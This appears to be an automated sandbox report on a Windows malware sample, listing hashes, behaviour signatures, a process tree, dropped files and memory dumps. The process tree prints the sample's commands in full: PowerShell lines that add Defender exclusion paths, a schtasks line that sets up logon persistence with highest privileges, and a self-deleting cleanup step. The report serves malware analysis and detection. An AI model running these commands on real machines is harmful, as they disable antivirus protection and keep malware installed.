Analysis

  • max time kernel
    142s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/02/2024, 10:40

General

  • Target

    8c1fd98508ff08117b3606ef3df1c5f9.exe

  • Size

    418KB

  • MD5

    8c1fd98508ff08117b3606ef3df1c5f9

  • SHA1

    998dd4c108e218eb912347af50d73eed62f63ce8

  • SHA256

    ff7fe52815a4f067620b5f063aad20ea81ff68f85c63a100cae2b42c477b1a8a

  • SHA512

    363384ed12920cd003dd1fddb82718fc5fef52eb1d4459a6b248acb518d3f0fa45f0958a104004d54d42720f502957d560580a591aa2bd4db2c31f7bd2143116

  • SSDEEP

    6144:cNMUe2TLW5FLFRoi/+zFefn98X+7bzEsToiK:cNMUz+5ZEi/tSMEsToi

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\8c1fd98508ff08117b3606ef3df1c5f9.exe
    "C:\Users\Admin\AppData\Local\Temp\8c1fd98508ff08117b3606ef3df1c5f9.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4432
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4396
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1004
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:836
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3984
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2044
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\8c1fd98508ff08117b3606ef3df1c5f9.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2548
      • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
        C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\8c1fd98508ff08117b3606ef3df1c5f9.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1640
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4776
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
            5⤵
            • Creates scheduled task(s)
            PID:2888
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2104
        • C:\Windows\system32\services32.exe
          "C:\Windows\system32\services32.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3112
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1932
            • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
              C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3356
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:3516
  • C:\Windows\system32\cmd.exe
    "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4492
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3348
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4644
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3432
  • C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    1⤵
      PID:1568
    • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
      "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
      1⤵
      • Executes dropped EXE
      PID:2884
    • C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
      1⤵
      • Creates scheduled task(s)
      PID:3684
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:3108
    • C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 3
      1⤵
        PID:2784

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost32.exe.log

        Filesize

        539B

        MD5

        b245679121623b152bea5562c173ba11

        SHA1

        47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

        SHA256

        73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

        SHA512

        75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        a9293ef980c925abe33d940554ed8575

        SHA1

        9b6d85f2595f7fd4923f52b21ab7607279066969

        SHA256

        8313a191aa9d11cce868d95ac9a9b1609275bfe93131fcb6e547b985b0242fbe

        SHA512

        2003d90bb2bc89378ccaeb9c5edf76b2dfd93c80369d063e56141abb8d7fea6acee6a103874ab227bc1548437269c8e4ee5174bf482ecf3d66c38f3e0ba35d85

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        15dde0683cd1ca19785d7262f554ba93

        SHA1

        d039c577e438546d10ac64837b05da480d06bf69

        SHA256

        d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

        SHA512

        57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        10fb30dc297f99d6ebafa5fee8b24fa2

        SHA1

        76904509313a49a765edcde26b69c3a61f9fa225

        SHA256

        567bcacac120711fc04bf8e6c8cd0bff7b61e8ee0a6316254d1005ebb1264e6a

        SHA512

        c42ace1ea0923fa55592f4f486a508ea56997fdbe0200016b0fc16a33452fc28e4530129a315b3b3a5ede37a07097c13a0eb310c9e91e5d97bb7ce7b955b9498

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        d28a889fd956d5cb3accfbaf1143eb6f

        SHA1

        157ba54b365341f8ff06707d996b3635da8446f7

        SHA256

        21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

        SHA512

        0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        eb1ad317bd25b55b2bbdce8a28a74a94

        SHA1

        98a3978be4d10d62e7411946474579ee5bdc5ea6

        SHA256

        9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98

        SHA512

        d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        96e3b86880fedd5afc001d108732a3e5

        SHA1

        8fc17b39d744a9590a6d5897012da5e6757439a3

        SHA256

        c3077e4cadb4ed246c02abe55aa6cf832fee4c2546b7addb7d22cd1c7c8c1294

        SHA512

        909b1968f7204fa7029109b02232d8cc5438f6b4dc7c9044e4e47c59fcee538199b13029e36592b12ed573d48a308dd4822d2ced4129ab08d4111897e02be55d

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ejonasjq.kdo.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\svchost32.exe

        Filesize

        117KB

        MD5

        ecd89d73116fb41543ca699f96120672

        SHA1

        7efb4beac0cc8a394c22b6eedb424a5d78fea7f5

        SHA256

        5fca8b9a2d38a924fc8df81ca630cad05748fb6d5d260de894b7cde14259b5fb

        SHA512

        5420a07c16162437c484dfdcd5689fc4f2a3ce917663f256dc94dce1b64af85b6611ebf162606f40a160594b71fd737c890017211afc25bf41cc3c67bacc8285

      • C:\Windows\System32\services32.exe

        Filesize

        146KB

        MD5

        15a30c4284e3603fe99b392a27785994

        SHA1

        1e575ca2470ee1b79687c2303341f5cdfde4f699

        SHA256

        528c60af1078132267b07155d257a47814f954550b098471bf420171a541d5d8

        SHA512

        5cdda69758efd184acae6f18afaf3ae931e6692715bbc045ce5fbd6245278f553bbb33786f0d70cbb3424a66ca9fa38e9b1b8002fccff961d6a87c3264872476

      • C:\Windows\System32\services32.exe

        Filesize

        82KB

        MD5

        4285da07c338ff956bc756e0362a0f52

        SHA1

        d4f30d2dc6a9db021d9e7cf2837fe0fa5db092da

        SHA256

        ec00efd258ee41f88958406058378f101c2668f43a803e728be56f72d2af503a

        SHA512

        093edcd5de09e4b53f5046ea4a7fdc2da9fb5504f37f33ce1a76dc1402b8d632a03c32d305d3d02df4b8923317e2451f51250baae341c34425030a8ec5b14e3d

      • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe

        Filesize

        51KB

        MD5

        082933f6971c052b2635147768940242

        SHA1

        72a082d7ac1dcfb2554e2851b297663251a7295d

        SHA256

        b73b3244a431ea995318e07f3786528651a0e6771cd79451a99a889b18f1187d

        SHA512

        6213210955ed3ccecbe93111e73779800a91e23dc1a606c9c8164fb535e4bb329215d775019bf0cd05edb808d5b3af94fdeabf497e25aef6aca57fb7606a7820

      • C:\Windows\system32\services32.exe

        Filesize

        253KB

        MD5

        7e92730684cb4d48421b86449c1a643a

        SHA1

        144b0fb062bc3ea134af5c0ffb5b0652659b9354

        SHA256

        535f314ddc17d80af44562cdf69d4e311e811109581044fe6c28016516e4497e

        SHA512

        babfe577fa6caa5549e9b0ee9563baccabe9b9e00ded718e846c6a6838ab82bc0e7590108c179ad3c90b9b285eab5b92e440ac8b919ffe6ec05b4945db3edccc

      • memory/836-30-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/836-33-0x0000028C68AB0000-0x0000028C68AC0000-memory.dmp

        Filesize

        64KB

      • memory/836-31-0x0000028C68AB0000-0x0000028C68AC0000-memory.dmp

        Filesize

        64KB

      • memory/836-36-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/1004-19-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/1004-10-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/1004-15-0x000001C6A6760000-0x000001C6A6770000-memory.dmp

        Filesize

        64KB

      • memory/1004-16-0x000001C6A6760000-0x000001C6A6770000-memory.dmp

        Filesize

        64KB

      • memory/1004-9-0x000001C6A8920000-0x000001C6A8942000-memory.dmp

        Filesize

        136KB

      • memory/1640-76-0x0000000000990000-0x00000000009B2000-memory.dmp

        Filesize

        136KB

      • memory/1640-128-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/1640-80-0x000000001C540000-0x000000001C550000-memory.dmp

        Filesize

        64KB

      • memory/1640-79-0x00000000013C0000-0x00000000013D2000-memory.dmp

        Filesize

        72KB

      • memory/1640-78-0x0000000001360000-0x0000000001372000-memory.dmp

        Filesize

        72KB

      • memory/1640-77-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/2044-64-0x000001E971FB0000-0x000001E971FC0000-memory.dmp

        Filesize

        64KB

      • memory/2044-69-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/2044-67-0x000001E971FB0000-0x000001E971FC0000-memory.dmp

        Filesize

        64KB

      • memory/2044-53-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/2044-66-0x000001E971FB0000-0x000001E971FC0000-memory.dmp

        Filesize

        64KB

      • memory/2044-54-0x000001E971FB0000-0x000001E971FC0000-memory.dmp

        Filesize

        64KB

      • memory/2884-188-0x0000000000360000-0x0000000000372000-memory.dmp

        Filesize

        72KB

      • memory/2884-190-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/2884-189-0x0000000001120000-0x0000000001126000-memory.dmp

        Filesize

        24KB

      • memory/3112-146-0x00000000031C0000-0x00000000031D0000-memory.dmp

        Filesize

        64KB

      • memory/3112-172-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/3112-129-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/3112-95-0x0000000001380000-0x00000000013A2000-memory.dmp

        Filesize

        136KB

      • memory/3112-97-0x00000000031C0000-0x00000000031D0000-memory.dmp

        Filesize

        64KB

      • memory/3112-96-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/3348-99-0x00000204E8800000-0x00000204E8810000-memory.dmp

        Filesize

        64KB

      • memory/3348-100-0x00000204E8800000-0x00000204E8810000-memory.dmp

        Filesize

        64KB

      • memory/3348-112-0x00000204E8800000-0x00000204E8810000-memory.dmp

        Filesize

        64KB

      • memory/3348-111-0x00000204E8800000-0x00000204E8810000-memory.dmp

        Filesize

        64KB

      • memory/3348-114-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/3348-98-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/3356-173-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/3356-174-0x000000001C4A0000-0x000000001C4B0000-memory.dmp

        Filesize

        64KB

      • memory/3432-165-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/3432-159-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/3432-160-0x0000017FF43D0000-0x0000017FF43E0000-memory.dmp

        Filesize

        64KB

      • memory/3432-163-0x0000017FF43D0000-0x0000017FF43E0000-memory.dmp

        Filesize

        64KB

      • memory/3432-162-0x0000017FF43D0000-0x0000017FF43E0000-memory.dmp

        Filesize

        64KB

      • memory/3984-46-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/3984-48-0x0000025134070000-0x0000025134080000-memory.dmp

        Filesize

        64KB

      • memory/3984-52-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/3984-50-0x0000025134070000-0x0000025134080000-memory.dmp

        Filesize

        64KB

      • memory/4432-49-0x00000000039F0000-0x0000000003A00000-memory.dmp

        Filesize

        64KB

      • memory/4432-34-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/4432-1-0x0000000003850000-0x0000000003872000-memory.dmp

        Filesize

        136KB

      • memory/4432-3-0x00000000039F0000-0x0000000003A00000-memory.dmp

        Filesize

        64KB

      • memory/4432-2-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/4432-0-0x0000000000E90000-0x0000000000EFC000-memory.dmp

        Filesize

        432KB

      • memory/4432-74-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/4644-132-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/4644-130-0x0000026025470000-0x0000026025480000-memory.dmp

        Filesize

        64KB

      • memory/4644-120-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/4644-121-0x0000026025470000-0x0000026025480000-memory.dmp

        Filesize

        64KB

      • memory/4644-127-0x0000026025470000-0x0000026025480000-memory.dmp

        Filesize

        64KB

      • memory/4736-143-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB

      • memory/4736-147-0x00000195E6110000-0x00000195E6120000-memory.dmp

        Filesize

        64KB

      • memory/4736-145-0x00000195E6110000-0x00000195E6120000-memory.dmp

        Filesize

        64KB

      • memory/4736-144-0x00000195E6110000-0x00000195E6120000-memory.dmp

        Filesize

        64KB

      • memory/4736-149-0x00007FFD94720000-0x00007FFD951E1000-memory.dmp

        Filesize

        10.8MB